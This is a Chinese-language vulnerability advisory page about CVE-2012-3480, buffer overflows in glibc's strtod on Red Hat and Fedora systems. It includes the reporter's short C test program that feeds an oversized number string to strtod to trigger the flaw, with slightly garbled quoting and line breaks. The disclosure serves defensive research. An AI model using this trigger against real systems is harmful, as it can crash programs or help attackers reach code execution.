发布日期:2012-08-13
更新日期:2012-08-14受影响系统:
RedHat Enterprise Linux 6
RedHat Enterprise Linux 5.0
RedHat Fedora 17
RedHat Fedora 16
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54982
CVE ID: CVE-2012-3480glibc是绝大多数Linux操作系统中C库的实现。GNU glibc在实现上存在多个缓冲区溢出漏洞,本地攻击者可利用这些执行任意代码。<*来源:Joseph S. Myer
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Joseph S. Myer ()提供了如下测试方法:include <stdio.h>
#include <stdlib.h>
#include <string.h>#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror ("malloc");
exit (EXIT_FAILURE);
}
p[0] = "1";
memset (p + 1, "0", SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf ("%a
", d);
exit (EXIT_SUCCESS);
}建议:
--------------------------------------------------------------------------------
厂商补丁:RedHat
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.redhat.com/apps/support/errata/index.htmlFetchmail NTLM身份验证调试模式远程拒绝服务安全漏洞Siemens COMOS不明细节安全限制绕过漏洞相关资讯 glibc 栈缓冲区溢出漏洞
- Glibc 内存申请和释放及堆连续检查 (08月04日)
- GNU C Library 整数溢出漏洞(CVE- (04月21日)
- GNU C Library高危漏洞影响大量应 (02月17日)
| - Glibc内存管理方式 (08月03日)
- Glibc 2.23发布,修复了重大的网络 (02月20日)
- 通过修改 glibc 支持 DNS 加密 (02月06日)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站